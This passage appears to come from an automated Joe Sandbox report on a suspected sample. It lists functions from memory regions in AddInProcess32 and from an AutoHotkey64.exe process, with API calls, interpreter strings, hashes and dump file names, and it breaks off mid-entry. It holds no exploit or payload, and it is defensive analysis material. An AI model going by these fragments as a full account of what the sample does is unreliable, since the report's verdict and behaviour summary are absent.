API String ID: 2538663250-0
Opcode ID: 10f5f2ecf9c93553acc2fd33e3b3de84dc93bbe1fabc10360a933e3e0f71cf3b
Instruction ID: c8c3fee76975c57f2037ddf7a2eec5967575d8cf6f75cebef96a273d612b62f1
Opcode Fuzzy Hash: 10f5f2ecf9c93553acc2fd33e3b3de84dc93bbe1fabc10360a933e3e0f71cf3b
Instruction Fuzzy Hash: 601100B19003488FCB20DF9AD549BDEFBF8EB48324F208499D919A7210D779A944CFA5

Function 00B58B40 Relevance: 1.5, APIs: 1, Instructions: 45
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 00B58B9D

Memory Dump Source

Source File: 0000000D.00000002.1925789878.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b50000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: eff43f34532e566906e3ba45f8964060ab06e14da140e2bb2c61e71ad00f9b97
Instruction ID: 0377aa588769525b8dd8acb4f5e0897d921f65f0da6d2a952c92fcaf8c5e1d3a
Opcode Fuzzy Hash: eff43f34532e566906e3ba45f8964060ab06e14da140e2bb2c61e71ad00f9b97
Instruction Fuzzy Hash: 4A1103B5900348CFCB10DF9AD545BCEFBF4EB48324F208459D558A7210D775A544CFA5

Function 00B59FB1 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 00B5A010

Memory Dump Source

Source File: 0000000D.00000002.1925789878.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b50000_AddInProcess32.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 20bef8a510b84e7b44897971b2444bdc04506b44d9ac86cb8dd08f266b8128df
Instruction ID: 6f1321e3b59e8328eea72d6d42decfc6839c20aa6480b81749ec25e6fd346ad9
Opcode Fuzzy Hash: 20bef8a510b84e7b44897971b2444bdc04506b44d9ac86cb8dd08f266b8128df
Instruction Fuzzy Hash: 941133B6800349CFCB20DF99C544BDEBBF4EB48320F14846AD958A7340D778A944CFA5

Function 00B59FB8 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 00B5A010

Memory Dump Source

Source File: 0000000D.00000002.1925789878.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b50000_AddInProcess32.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1f7b41925335b97301ab5de498827e9b21f0490a178c7e7e1beeda91034d5dfc
Instruction ID: 44d89c37bc9fdfdfb7295942c6e8cf934bd42e8f2f501d49074c3db2a0ac1885
Opcode Fuzzy Hash: 1f7b41925335b97301ab5de498827e9b21f0490a178c7e7e1beeda91034d5dfc
Instruction Fuzzy Hash: DF1103B5800349CFCB20DF9AC545BDEBBF4EB48320F14846AD958A7250D779A944CFA5

Function 00AFD4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1924947884.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_afd000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06c0036259c9f7b792080567c2892fb3938af5b1aa915a9295d693d16a6939b0
Instruction ID: 55553486c6df18a3cdea672ba3ce7ded1b3433d8cafe3a71ef39f30bb762b7b8
Opcode Fuzzy Hash: 06c0036259c9f7b792080567c2892fb3938af5b1aa915a9295d693d16a6939b0
Instruction Fuzzy Hash: AD212571500208DFCB06DF94D9C4B26BFA6FB98318F208569EA094B256C336D856CAA2

Function 00AFD4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1924947884.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_afd000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 958f0d411a3d080682462c7e5ce14785679e39a3f5747be2db2be9cac68f7953
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 2E11D376504244CFCB16CF54D5C4B26BF72FB94318F24C6A9E9090B256C33AD85ACBA2

Analysis Process: AutoHotkey64.exePID: 3488, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.2%
Total number of Nodes:	1171
Total number of Limit Nodes:	42

Executed Functions

Function 000000014002B3D7 Relevance: 116.6, APIs: 25, Strings: 40, Instructions: 2818COMMON

Download Yara Rule

Strings

Continuation section too long., xrefs: 000000014002E0E3
{Blind}%s%s{%s DownR}, xrefs: 000000014002CEFC
%s::, xrefs: 000000014002CF7C
Return, xrefs: 000000014002D807
<>=/|^,:, xrefs: 000000014002BD48
Static, xrefs: 000000014002CDF8
Not a valid property getter/setter., xrefs: 000000014002E159
{RCtrl up}, xrefs: 000000014002CBA1
Get, xrefs: 000000014002CA56
This line does not contain a recognized action., xrefs: 000000014002E253
?*- , xrefs: 000000014002BBA6
Missing ")", xrefs: 000000014002E276
{Blind}{%s Up}, xrefs: 000000014002E046
This hotstring is missing its abbreviation., xrefs: 000000014002E1C7
Note: The hotkey %s will not be active because it does not exist in the current keyboard layout., xrefs: 000000014002DB38
if not GetKeyState("%s"), xrefs: 000000014002CED2
Not a valid method, class or property definition., xrefs: 000000014002E104, 000000014002E170
Set, xrefs: 000000014002CA6F
IfWin should be #IfWin., xrefs: 000000014002E187
#CommentFlag, xrefs: 000000014002B487
%s%s%s, xrefs: 000000014002D728
Default, xrefs: 000000014002D28A
RTrim, xrefs: 000000014002B9DD
Join, xrefs: 000000014002B95A
<>=/|^,:*&~!()[]{}+-?."'\;`, xrefs: 000000014002CC58
Invalid single-line hotkey/hotstring., xrefs: 000000014002E1AB
Class, xrefs: 000000014002CC06
Out of memory., xrefs: 000000014002DED6, 000000014002E1FD, 000000014002E22F
and, xrefs: 000000014002BCF5
Hotkeys/hotstrings are not allowed inside functions., xrefs: 000000014002E21B
%s up::, xrefs: 000000014002CF55
Missing "{", xrefs: 000000014002E0FD, 000000014002E12D
{LCtrl up}, xrefs: 000000014002CEED
Duplicate hotkey., xrefs: 000000014002E1DE
OnClipboardChange, xrefs: 000000014002DEAD
LTrim, xrefs: 000000014002B9B5
Functions cannot contain functions., xrefs: 000000014002E148
<>=/|^,:.+-*&!?~, xrefs: 000000014002BB34
Duplicate label., xrefs: 000000014002DD05
& , xrefs: 000000014002BC16, 000000014002D679

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID:
String ID: <>=/|^,:*&~!()[]{}+-?."'\;`$ & $#CommentFlag$%s up::$%s%s%s$%s::$<>=/|^,:$<>=/|^,:.+-*&!?~$?*- $Class$Continuation section too long.$Default$Duplicate hotkey.$Duplicate label.$Functions cannot contain functions.$Get$Hotkeys/hotstrings are not allowed inside functions.$IfWin should be #IfWin.$Invalid single-line hotkey/hotstring.$Join$LTrim$Missing ")"$Missing "{"$Not a valid method, class or property definition.$Not a valid property getter/setter.$Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.$OnClipboardChange$Out of memory.$RTrim$Return$Set$Static$This hotstring is missing its abbreviation.$This line does not contain a recognized action.$and$if not GetKeyState("%s")${Blind}%s%s{%s DownR}${Blind}{%s Up}${LCtrl up}${RCtrl up}
API String ID: 0-2793573874
Opcode ID: 6afb5b597c72751738172687ea1a7f0f8cc8d7f657ebd8dbcee881ca6fc316b7
Instruction ID: c922a5e18323dde001dd9bdf035c49713fa52ca50ef22eaa2375b4a36325462e
Opcode Fuzzy Hash: 6afb5b597c72751738172687ea1a7f0f8cc8d7f657ebd8dbcee881ca6fc316b7
Instruction Fuzzy Hash: 2A43DE3621469085FB629B269414BEE37A1FB4CBD8F94421AFF5907AF9EB78CD45C300

Function 0000000140063220 Relevance: 75.8, APIs: 38, Strings: 5, Instructions: 524registrywindowCOMMON

Download Yara Rule

APIs

RegisterWindowMessageW.USER32 ref: 000000014006325C

Strings

9000, xrefs: 0000000140063CF6
TaskbarCreated, xrefs: 0000000140063255
, xrefs: 00000001400636B4
AHK_ATTACH_DEBUGGER, xrefs: 000000014006398E
localhost, xrefs: 0000000140063CD7

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: MessageRegisterWindow
String ID: $9000$AHK_ATTACH_DEBUGGER$TaskbarCreated$localhost
API String ID: 1814269913-2055397393
Opcode ID: 43bb553749a1f0c1c78a394f6c5aac775979efa71af8c8d701c576568cc93282
Instruction ID: a7392edce788951db9e27e759429faef39d5a114dd0901b07d2ef0b24b319e5c
Opcode Fuzzy Hash: 43bb553749a1f0c1c78a394f6c5aac775979efa71af8c8d701c576568cc93282
Instruction Fuzzy Hash: 1A32BFB52006448AFB66CB27E8447E977A2F74CBD8F644819EB4E537B4DB38D846C780

Function 00000001400291A0 Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 233
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400BB4B0: LoadLibraryExW.KERNEL32 ref: 00000001400BB4E3
Part of subcall function 00000001400BB4B0: FindResourceW.KERNEL32 ref: 00000001400BB568
Part of subcall function 00000001400BB4B0: LoadResource.KERNEL32 ref: 00000001400BB57D
Part of subcall function 00000001400BB4B0: LockResource.KERNEL32 ref: 00000001400BB58F
Part of subcall function 00000001400BB4B0: GetSystemMetrics.USER32 ref: 00000001400BB5AF
Part of subcall function 00000001400BB4B0: FindResourceW.KERNEL32 ref: 00000001400BB625
Part of subcall function 00000001400BB4B0: LoadResource.KERNEL32 ref: 00000001400BB639
Part of subcall function 00000001400BB4B0: LockResource.KERNEL32 ref: 00000001400BB647

GetSystemMetrics.USER32 ref: 0000000140029238

Part of subcall function 00000001400BB4B0: EnumResourceNamesW.KERNEL32 ref: 00000001400BB54B
Part of subcall function 00000001400BB4B0: SizeofResource.KERNEL32 ref: 00000001400BB65B
Part of subcall function 00000001400BB4B0: CreateIconFromResourceEx.USER32 ref: 00000001400BB67E

LoadCursorW.USER32 ref: 000000014002927A
RegisterClassExW.USER32 ref: 00000001400292A5
RegisterClassExW.USER32 ref: 00000001400292CC
GetForegroundWindow.USER32 ref: 0000000140029303
GetClassNameW.USER32 ref: 000000014002931F
CreateWindowExW.USER32 ref: 00000001400293A2
GetMenu.USER32 ref: 00000001400293C7
EnableMenuItem.USER32 ref: 00000001400293DE
CreateWindowExW.USER32 ref: 0000000140029446
GetDC.USER32 ref: 00000001400294A3
GetDeviceCaps.GDI32 ref: 00000001400294CD
MulDiv.KERNEL32 ref: 00000001400294DE
CreateFontW.GDI32 ref: 0000000140029522
ReleaseDC.USER32 ref: 0000000140029539
SendMessageW.USER32 ref: 0000000140029554
SendMessageW.USER32 ref: 000000014002956C
ShowWindow.USER32 ref: 000000014002957B
ShowWindow.USER32 ref: 000000014002958A
ShowWindow.USER32 ref: 00000001400295A9
SetWindowLongW.USER32 ref: 00000001400295BD
LoadAcceleratorsW.USER32 ref: 00000001400295CF

Strings

P, xrefs: 0000000140029212
CreateWindow, xrefs: 000000014002945C
Shell_TrayWnd, xrefs: 0000000140029329
edit, xrefs: 000000014002940D
RegClass, xrefs: 00000001400292DB
Lucida Console, xrefs: 00000001400294B0
AutoHotkey, xrefs: 00000001400291E7
Consolas, xrefs: 00000001400294BA
AutoHotkey2, xrefs: 00000001400292B0

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: Resource$Window$Load$Create$ClassShow$FindLockMenuMessageMetricsRegisterSendSystem$AcceleratorsCapsCursorDeviceEnableEnumFontForegroundFromIconItemLibraryLongNameNamesReleaseSizeof
String ID: AutoHotkey$AutoHotkey2$Consolas$CreateWindow$Lucida Console$P$RegClass$Shell_TrayWnd$edit
API String ID: 221421807-2636979444
Opcode ID: 0a0bf190ad6466050cd76611af0cacba0b9938d38feded7827f8f3b3fd9cb258
Instruction ID: e1b3866f4365a83736c0df2819c35d5566c22b8c9faf5ea9def45bc2c5e60920
Opcode Fuzzy Hash: 0a0bf190ad6466050cd76611af0cacba0b9938d38feded7827f8f3b3fd9cb258
Instruction Fuzzy Hash: F8C14971208B8086E762DB26F8547DA73A5FB8DB94F544129EB8A53B78DF3CC845CB40

Function 000000014000280B Relevance: 39.0, APIs: 19, Strings: 3, Instructions: 466windowclipboardthreadCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001D56
GetMessageW.USER32 ref: 0000000140001D8C
GetTickCount.KERNEL32 ref: 0000000140001D97
ShowWindow.USER32 ref: 000000014000291C
GetForegroundWindow.USER32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.02,?,00000001400C11F9), ref: 0000000140002A66
GetWindowThreadProcessId.USER32 ref: 0000000140002A7D
GetClassNameW.USER32 ref: 0000000140002A9F
IsDialogMessageW.USER32 ref: 0000000140002AE1
SetCurrentDirectoryW.KERNEL32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.02,?,00000001400C11F9), ref: 0000000140002B11
DragFinish.SHELL32 ref: 0000000140003130
GetTickCount.KERNEL32 ref: 0000000140003219
wcsncpy.LIBCMT ref: 0000000140003237
wcsncpy.LIBCMT ref: 000000014000325E
IsClipboardFormatAvailable.USER32 ref: 00000001400032CC
IsClipboardFormatAvailable.USER32 ref: 00000001400032D9
wcsncpy.LIBCMT ref: 0000000140003329
GetTickCount.KERNEL32 ref: 000000014000334E

Part of subcall function 0000000140006AC0: IsClipboardFormatAvailable.USER32 ref: 0000000140006AE8
Part of subcall function 0000000140006AC0: IsClipboardFormatAvailable.USER32 ref: 0000000140006AF7

Strings

#32770, xrefs: 0000000140002AAC
<<>>, xrefs: 00000001400032E8
uQz5, xrefs: 0000000140001D6F

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: AvailableClipboardCountFormatTick$Windowwcsncpy$Message$ClassCurrentDialogDirectoryDragFinishForegroundNameProcessShowThread
String ID: #32770$<<>>$uQz5
API String ID: 533211433-2926917739
Opcode ID: 2335a2c4502bdc716216ef219de9bdf6fa9ec96820329d12bef35574ee414c27
Instruction ID: 8cfbfb00545958bb1eeb41e088e1f1a89de361b86735d798c8fc3320db1d7d42
Opcode Fuzzy Hash: 2335a2c4502bdc716216ef219de9bdf6fa9ec96820329d12bef35574ee414c27
Instruction Fuzzy Hash: 67329BB2604A948AFB63CF27A9403E937A5F74DBD4F544116EB4A57BB8DB38C981C700

Function 00000001400722B0 Relevance: 35.5, APIs: 19, Strings: 1, Instructions: 530fileCOMMON

Download Yara Rule

APIs

_wcstoui64.LIBCMT ref: 000000014007245E
CreateFileW.KERNELBASE ref: 000000014007251D
GetLastError.KERNEL32 ref: 000000014007252C
GetFileSize.KERNEL32 ref: 0000000140072559
GetLastError.KERNEL32 ref: 000000014007256F
GetLastError.KERNEL32 ref: 000000014007258C
CloseHandle.KERNEL32 ref: 000000014007259F
CloseHandle.KERNEL32 ref: 00000001400725E1
ReadFile.KERNELBASE ref: 000000014007267A
GetLastError.KERNEL32 ref: 000000014007268A
CloseHandle.KERNELBASE ref: 000000014007269D
free.LIBCMT ref: 0000000140072797
free.LIBCMT ref: 0000000140072A7C
free.LIBCMT ref: 0000000140072ACF

Strings

Out of memory., xrefs: 00000001400725C2, 000000014007271E

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: ErrorLast$CloseFileHandlefree$CreateReadSize_wcstoui64
String ID: Out of memory.
API String ID: 144052852-4087320997
Opcode ID: dfa6768a1c729cf006a415aa595941a6f9b3795464534c67d51390788326fb62
Instruction ID: f4ec8e51ce2462d77a4595e43828260908613a4441788825181ed53a7623f35d
Opcode Fuzzy Hash: dfa6768a1c729cf006a415aa595941a6f9b3795464534c67d51390788326fb62
Instruction Fuzzy Hash: 1E22033220468081EB66AB27A5103EA67A1FB8DBE4F884215FF9A077F5DB3CC545D300

Function 000000014002AED0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

realloc.LIBCMT ref: 000000014002AF6E
FindResourceW.KERNEL32 ref: 000000014002B098
LoadResource.KERNEL32 ref: 000000014002B0AB
LockResource.KERNEL32 ref: 000000014002B0B9
SizeofResource.KERNEL32 ref: 000000014002B0CE
FindResourceW.KERNEL32 ref: 000000014002B1F8

Strings

#Include, xrefs: 000000014002B260
Too many includes., xrefs: 000000014002AF35
*#2, xrefs: 000000014002B203
%s file "%s" cannot be opened., xrefs: 000000014002B270
Out of memory., xrefs: 000000014002AF82, 000000014002B1A8
Script, xrefs: 000000014002B269

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: Resource$Find$LoadLockSizeofrealloc
String ID: #Include$%s file "%s" cannot be opened.$*#2$Out of memory.$Script$Too many includes.
API String ID: 95980184-3189951223
Opcode ID: 57408ecd82452396b10976bb6d79debf4c8c2a57ae2994c7bf457511b4c156ac
Instruction ID: 467ced3ae4870d444bdbeb142725d9155c2d694f10dfa98c0e100a113c2b1971
Opcode Fuzzy Hash: 57408ecd82452396b10976bb6d79debf4c8c2a57ae2994c7bf457511b4c156ac
Instruction Fuzzy Hash: 95B19D71214B8581FA639F53A4907EA63A0FB8CBC4F84442AAF5A07BB5EF7CC955C740

Function 0000000140093390 Relevance: 24.6, APIs: 9, Strings: 4, Instructions: 1891COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,0000000140096E1F), ref: 000000014009363F
GetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,0000000140096E1F), ref: 0000000140093966
free.LIBCMT ref: 0000000140093F80
_wcstoi64.LIBCMT ref: 00000001400954E9
_wcstoi64.LIBCMT ref: 000000014009558C
free.LIBCMT ref: 00000001400956C5
free.LIBCMT ref: 0000000140095E7B

Strings

, xrefs: 0000000140095CDF
Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140093DD1, 0000000140095BBF
Out of memory., xrefs: 0000000140093FDD, 00000001400956A0, 0000000140095712, 000000014009572F, 0000000140095E01
, xrefs: 0000000140093EAD

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: free$EnvironmentVariable_wcstoi64
String ID: $ $Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 2232209690-4280895764
Opcode ID: 6faafe8ae21aac68632af56fdc6a5d3ccdcc21d360c1dff6baa4a8984a56161d
Instruction ID: d73a32617c964e38f2a44c13b2e3946f850230aa72d0397f2b8ccb1a11747354
Opcode Fuzzy Hash: 6faafe8ae21aac68632af56fdc6a5d3ccdcc21d360c1dff6baa4a8984a56161d
Instruction Fuzzy Hash: 5903DC72200B8486EB66AF27D4943ED27A1FB48BD5F958216FB5A57BF4DB34C981C300

Function 0000000140041408 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 480windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322
_wcstoi64.LIBCMT ref: 00000001400416A4

Part of subcall function 00000001400D95A0: _errno.LIBCMT ref: 00000001400D9523
Part of subcall function 00000001400D95A0: _invalid_parameter_noinfo.LIBCMT ref: 00000001400D952E

free.LIBCMT ref: 0000000140041782
free.LIBCMT ref: 00000001400417BA

Strings

D, xrefs: 000000014004156D

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$free$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo_wcstoi64
String ID: D
API String ID: 3911087108-2746444292
Opcode ID: 8ac778026cc458c0a533329ba544f14d11858d590f5707c7ebb512ff1b6b8843
Instruction ID: f80d3e1244f4831dca507bdced43c9b5c17565dfc6438650252d1f39c8c18e65
Opcode Fuzzy Hash: 8ac778026cc458c0a533329ba544f14d11858d590f5707c7ebb512ff1b6b8843
Instruction Fuzzy Hash: 9B227C72604A9489FB668B27E4503ED37A1F78CBD8F164136EB4A67AF5DB34C881C704

Function 00000001400408A3 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 481COMMON

Download Yara Rule

Strings

Parameter #3 invalid., xrefs: 00000001400464B3
